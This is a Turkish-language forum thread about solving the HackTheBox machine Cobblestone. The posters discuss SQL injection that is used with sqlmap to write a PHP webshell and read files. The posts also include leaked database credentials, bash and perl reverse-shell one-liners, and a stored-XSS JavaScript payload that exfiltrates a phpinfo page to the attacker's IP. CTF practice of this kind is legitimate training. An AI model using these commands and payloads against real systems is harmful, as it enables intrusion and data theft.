hackthebox cobblestone tartışma

[Neoax]

hackthebox da bulunan cobblestone makinesini çözen var mı? belli bir yere kadar geldim, kaldım.

http://vote.cobblestone.htb/suggest.php burada sql injection zafiyeti var ve file iznininde bulunmasından dolayı kısa dosyalar yükleyebiliyor ve dosya okuyabiliyorum.

aşağıdaki komut ile içerisinde <php system($_GET[''cmd]);?> kodunun bulunduğu bir dosya yükleyebiliyorum. nedenini bilmiyorum ama reverse shell dosyalarını ekleyemiyorum. Herhalde içeriği uzun olduğundan.

sqlmap -u http://vote.cobblestone.htb/suggest.php --random-agent --cookie="PHPSESSID=ue1c0m818820od0ta72lgb0htm" --data="url=" --file-write=/home/kali/shell.php --file-dest="/var/www/html/skins/shell.php"

yüklediğim web shell üzerinden de sadece belli başlı komutlar çalıştırabiliyorum. kısıtlıda olsa ls, pwd, ss, ps aux,id komutlarını kullanabiliyorum.

aşağıdaki komutla da dosyaların içeriğini çekebiliyorum.

sqlmap -u http://vote.cobblestone.htb/suggest.php --random-agent --cookie="PHPSESSID=ue1c0m818820od0ta72lgb0htm" --data="url=" --file-read=/var/www/html/skins.php

/var/www/html dizinindeki dosyalar aşağıdaki şekilde

total 116
drwxr-xr-x 10 root root 4096 Aug 10 11:47 .
drwxr-xr-x 5 root root 4096 Aug 20 02:20 ..
-rw-r--r-- 1 root root 56 Sep 27 2024 composer.json
-rw-r--r-- 1 root root 13867 Sep 27 2024 composer.lock
drwxr-xr-x 2 root root 4096 Apr 23 07:57 css
drwxr-xr-x 2 root root 4096 Oct 1 2024 db
-rw-r--r-- 1 root root 611 Sep 30 2024 download.php
drwxr-xr-x 2 root root 4096 Oct 1 2024 img
-rw-r--r-- 1 root root 1942 Oct 1 2024 index.php
drwxr-xr-x 2 root root 4096 Oct 1 2024 js
-rw-r--r-- 1 root root 6269 Apr 24 04:43 login.php
-rw-r--r-- 1 root root 1268 Apr 23 08:50 login_verify.php
-rw-r--r-- 1 root root 101 Sep 27 2024 logout.php
-rw-r--r-- 1 root root 493 Apr 24 02:55 preview_banner.php
-rw-r--r-- 1 root root 2062 Apr 28 06:53 register.php
drwxr-xrwx 2 root root 4096 Aug 20 02:20 skins
-rw-r--r-- 1 root root 7445 Apr 28 07:00 skins.php
-rw-r--r-- 1 root root 255 Apr 28 03:04 skins_app_admin_server_info.php
-rw-r--r-- 1 root root 1056 Apr 24 04:27 suggest_skin.php
drwxr-xr-x 2 root root 4096 Apr 28 04:03 templates
-rw-r--r-- 1 root root 3202 Aug 10 11:47 upload.php
-rw-r--r-- 1 root root 3267 Apr 28 07:04 user.php
drwxr-xr-x 5 root root 4096 Sep 27 2024 vendor
drwxr-xr-x 2 root root 4096 Sep 27 2024 webfonts

db dizinin içerisinde connection.php var orada mysql bilgileri bulunuyor ama sisteme giremedikten sonra ne anlamı var.

<?php

$dbserver = "localhost";
$username = "dbuser";
$password = "aichooDeeYanaekungei9rogi0eMuo2o";
$dbname = "cobblestone";

$conn = new mysqli($dbserver, $username, $password, $dbname);

// Check connection
if ($conn->connect_errno > 0) {
die("Connection failed: " . $conn->connect_error);
}
?>

son olarak /var/www/html dizininde skins_app_admin_server_info.php dosyası bulunuyor. bu dosyanın içerisinde kullanıcı bilgilerimiz ve phpinfo() bulunuyor. xss zafiyetinin yardımıyla admin rolüne geçebilirim diye düşündüm ama register sayfasında html karakterlerinin eklenmesini engelleyen bir kod var.

daha ne yapabilirim bilmiyorum. sizin ilerlemeniz ne. bu bölümü geçebildiniz mi

 

[fazeL]

ls, pwd, id gibi basit komutlar çalışıyor ama bash, nc, python gibi çalışmıyorsa filtreleniyor olabilir. O zaman php -r veya base64 encode edilmiş komutları deneyebilirsin. Belki dosya include / LFI ile birleşiyordur. Kendi yüklediğin dosyayı başka bir script içeri alıyor olabilir. Elinde dbuser parolası var. Onu sadece MySQL için değil, bazen sistem user’ı da aynı şifreyi kullanabiliyor denemek mantıklı. Senin dediğin skins_app_admin_server_info.php dosyası ipucu olabilir bazen phpinfo() üzerinden açık environment (ör. session save path, temp path, cookie info) ile saldırı yapılır.

Reverse shell için illa “uzun script” yazmak yerine 1–2 satırlık payload dene (ör. bash veya perl satırı). Eğer disable_functions varsa expect modülü veya MySQL’den file_write ile başka binary yazdırıp çalıştırma yoluna gitmek gerekebilir. Session / cookie manipülasyonu ile “admin” olma ihtimali yüksek.

 

[Neoax]

O zaman php -r veya base64 encode edilmiş komutları deneyebilirsin.

Aynısını chatgpt de söylemişti ama işe yaramıyor. Ekrana herhangi bir bilgi vermiyor.

Belki dosya include / LFI ile birleşiyordur. Kendi yüklediğin dosyayı başka bir script içeri alıyor olabilir

Almadığına eminim, ayrı bir dosya olarak çalıştırıyor ama bu dosyayı sacede /var/www/html/skins dizine yükleyebiliyorum. Bir alt dizine ekleme yetkim yok. Nedenini anlamadım.

Elinde dbuser parolası var. Onu sadece MySQL için değil, bazen sistem user’ı da aynı şifreyi kullanabiliyor denemek mantıklı

Bunu denedim. Sistemde john ve cobble adında iki kullanıcı var ama ikiside kabul etmiyor.

Senin dediğin skins_app_admin_server_info.php dosyası ipucu olabilir bazen phpinfo() üzerinden açık environment (ör. session save path, temp path, cookie info) ile saldırı yapılır.

İçerisinde önemli bir veri bulamadım. Sadece bahsettiğim kullanıcı bilgilerini ekrana yazdırıyor sonra phpinfo() kodunu çalıştırıyor. Eklediğim resimde görebilirsiniz.

Reverse shell için illa “uzun script” yazmak yerine 1–2 satırlık payload dene (ör. bash veya perl satırı). Eğer disable_functions varsa expect modülü veya MySQL’den file_write ile başka binary yazdırıp çalıştırma yoluna gitmek gerekebilir. Session / cookie manipülasyonu ile “admin” olma ihtimali yüksek.

/bin/bash -i >& /dev/tcp/10.10.15.9/1234 0>&1 ve perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.15.9:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' şeklindeki komutları kabul etmiyor. ikinci cümlenizi anlamadım. Sql injection zafiyetinin bulunduğu alana javascript komutları ekleyebiliyorum. O dosyaya biri baktığından gönderdiğim javascript kodları çalıştırılıyor ama cookie gibi geri dönüşler olmuyor. Büyük ihitmalle yapılması gereken iş skins_app_admin_server_info.php dosyası ile ilgili ama ne olduğunu bilmiyorum. Kullanılmasaydı öyle bir dosyayı kullanıcı bilgileri ile göstermezlerdi muhtemelen.

 

[fazeL]

Aynısını chatgpt de söylemişti ama işe yaramıyor. Ekrana herhangi bir bilgi vermiyor.

Almadığına eminim, ayrı bir dosya olarak çalıştırıyor ama bu dosyayı sacede /var/www/html/skins dizine yükleyebiliyorum. Bir alt dizine ekleme yetkim yok. Nedenini anlamadım.

Bunu denedim. Sistemde john ve cobble adında iki kullanıcı var ama ikiside kabul etmiyor.

İçerisinde önemli bir veri bulamadım. Sadece bahsettiğim kullanıcı bilgilerini ekrana yazdırıyor sonra phpinfo() kodunu çalıştırıyor. Eklediğim resimde görebilirsiniz.

/bin/bash -i >& /dev/tcp/10.10.15.9/1234 0>&1 ve perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.15.9:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' şeklindeki komutları kabul etmiyor. ikinci cümlenizi anlamadım. Sql injection zafiyetinin bulunduğu alana javascript komutları ekleyebiliyorum. O dosyaya biri baktığından gönderdiğim javascript kodları çalıştırılıyor ama cookie gibi geri dönüşler olmuyor. Büyük ihitmalle yapılması gereken iş skins_app_admin_server_info.php dosyası ile ilgili ama ne olduğunu bilmiyorum. Kullanılmasaydı öyle bir dosyayı kullanıcı bilgileri ile göstermezlerdi muhtemelen.

/var/www/html/skins altına dosya yükleyebiliyorsun ama payload çalıştırınca ekrana hiçbir çıktı gelmiyor diyorsun. İki sebepten olur:

disable_functions aktif (exec, system, shell_exec, passthru vs. kapalı). open_basedir veya chroot tarzı kısıtlama var. Böyle olunca normal bash -i veya perl ters kabuk komutları doğal olarak sonuç vermez.

Eğer dosya kullanıcı bilgilerini + phpinfo() veriyorsa, bu senin için bir “bilgi sızdırma” (information disclosure) noktasıdır. phpinfo() ekranında şunlara bakılmalı:

session.save_path (bazen yazma yetkisi olan dizin ipucu verir webshell koymak için).
upload_tmp_dir
disable_functions listesi
PHP sürümü, Apache modülleri

Senin dediğin “sql injection zafiyetine JS kodu ekleyebiliyorum, biri bakınca çalışıyor” kısmı aslında Stored XSS. Yönetici paneline giren admin tarayıcıda senin kodun çalışıyor ama cookie dönüşü olmuyorsa: HttpOnly bayrağı olabilir doğrudan document.cookie çekemezsin ama adminin tarayıcısı üzerinden başka bir istek yaptırabilirsin (CSRF / XSS to RCE zinciri).

Eğer reverse shell komut çalıştırma fonksiyonları kapalıysa şu yollar denenebilir:

PHP expect modülü: expect:// wrapper (varsa).
php://filter + file write üzerinden log poisoning (ör. Apache loguna kod yazıp include etmek).
MySQL FILE yazma hakkı (eğer dbuser yetkiliyse) /var/www/html/skins/shell.php içine kod düşürme.
Session hijacking: phpinfo’da session path yazıyorsa ve oraya yazma yetkin varsa sahte session ile admin girişi.

 

[Neoax]

session.save_path ->> /var/lib/php/sessions (bu dizinin içerisine webshell koysam nasıl çalıştırabilirim ki?)
upload_tmp_dir --> içi boş
disable_functions --> içi boş

PHP expect modülü: expect:// wrapper (varsa) bunları yapmama gerek yok. çünkü lfi yok. voteuser isimli mysql servisinde file yetkisi olduğu için sqlmap ile dosya indirebiliyorum. bu dosyaları sql injectiondan yararlanarak indiriyor. logların tutulduğu dosyalar görüntülenmiyor.

bahsettiğiniz üzere HttpOnly yüzünden cookie bilgilerini çekemiyorum ama aklıma şöyle bir şey geldi. phpinfo sayfasında cookie bilgileri gözüküyor. Aşağıdaki şekilde bir kod kullanırsak admin sayfası açıldığında cookie bilgilerinin bulunduğu phpinfo sayfasını bize gönderecek ve böylece adminin hesabına geçebiliriz.

async function exfil() {
    const response = await fetch('/skins_app_admin_server_info.php');
    const text = await response.text();

    const encoded = btoa(text);
    await fetch(`http://10.10.15.9:1234/exfil?data=${encodeURIComponent(encoded)}`);
}
exfil();

Ancak, yönetim paneli vote.cobblestone.htb adresinde bulunduğu için ana domaindeki phpinfo sayfasını görüntüleyemiyor, dolayısıyla cookie bilgilerini alamıyorum. site adresini http:// cobblestone.htb/skins_app_admin_server_info.php yaptığımda ise herhangi bir sonuç ekrana yansımıyor. aşağıdaki adreste söylediğim şeyin aynısını yapılıyor. kendim denediğimde sonuç alamıyorum. pes ettim, beynim acımaya başladı.

TryHackMe: Robots

Robots started with basic enumeration of a web application to discover an endpoint with register and login functionalities. Using an XSS vulnerability in the username field of registered accounts, we were able to steal the cookies of the admin user, which granted us access to another endpoint...

jaxafed.github.io